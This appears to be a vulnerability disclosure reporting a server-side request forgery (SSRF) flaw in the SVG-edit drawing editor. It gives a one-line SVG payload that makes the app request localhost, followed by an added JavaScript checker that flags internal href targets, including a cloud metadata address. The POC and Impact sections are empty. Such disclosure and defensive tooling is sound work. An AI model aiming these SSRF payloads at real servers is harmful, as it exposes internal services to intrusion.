vulnerability ssrf
severity 7.3
language javascript
registry other

:book: Description

SVG-edit is a fast, web-based, JavaScript-driven SVG drawing editor that works in any modern browser. This package is vulnerable to server-side request forgery (SSRF).

:recycle: Steps To Reproduce:

  1. Download and run the latest release from Or use demo
  2. Open the payload SVG. Payload used: rc3.svg

```xml
<svg xmlns="" xmlns:xlink="" style="position:relative" width="300" height="200" overflow="hidden"><image x="10" y="10" width="276" height="110" xlink:href="http://localhost:8080/svg"/><path d="M0 150h300v10H0z"/></svg>
```
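
One way to screen an SVG for the kind of reference used in the payload above, as an added example that is not part of the original report or of SVG-edit: it lists every `href` / `xlink:href` target and marks those that point at loopback, private or link-local hosts. The function names, the `base.invalid` placeholder and the sample SVG are constructed for illustration.

```javascript
// Added example (not SVG-edit code): classify href / xlink:href targets in an SVG.
// Regex prefilter only; it does not decode XML entities or resolve DNS names.

// Constructed sample; the first <image> mirrors the reference in the report.
const SAMPLE_SVG =
  '<svg width="300" height="200">' +
  '<image xlink:href="http://localhost:8080/svg"/>' +
  '<image href="data:image/png;base64,AAAA"/>' +
  '<image href="https://cdn.example.com/logo.png"/>' +
  '<image href="http://169.254.169.254/latest/"/>' +
  '<use href="#shape1"/></svg>';

const BASE = 'http://base.invalid/'; // placeholder base for relative references

function isInternalHost(hostname) {
  const h = hostname.toLowerCase();
  if (h === 'localhost' || h.endsWith('.localhost')) return true;
  if (h.startsWith('[')) { // IPv6 literal as returned by URL, e.g. [::1]
    const v6 = h.slice(1, -1);
    return v6 === '::1' || v6 === '::' || v6.startsWith('::ffff:') ||
      /^f[cd]/.test(v6) || /^fe[89ab]/.test(v6);
  }
  const m = /^(\d+)\.(\d+)\.\d+\.\d+$/.exec(h); // URL normalises IPv4 forms to dotted decimal
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) || (a === 169 && b === 254);
}

function classifyRef(href) {
  const ref = href.trim();
  if (ref.startsWith('#')) return 'fragment';
  let url;
  try { url = new URL(ref, BASE); } catch { return 'unparseable'; }
  if (url.protocol === 'data:') return 'inline';
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return 'other-scheme';
  if (url.hostname === 'base.invalid') return 'relative';
  return isInternalHost(url.hostname) ? 'internal' : 'external';
}

function auditSvg(svgText) {
  const re = /(?:xlink:)?href\s*=\s*(["'])(.*?)\1/gi;
  return [...svgText.matchAll(re)].map((m) => ({ href: m[2], verdict: classifyRef(m[2]) }));
}

console.log(auditSvg(SAMPLE_SVG));
```

A hostname that only resolves to an internal address is reported as `external` here, so the component that actually fetches the resource still has to check the resolved address.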

:telescope: POC

💥 Impact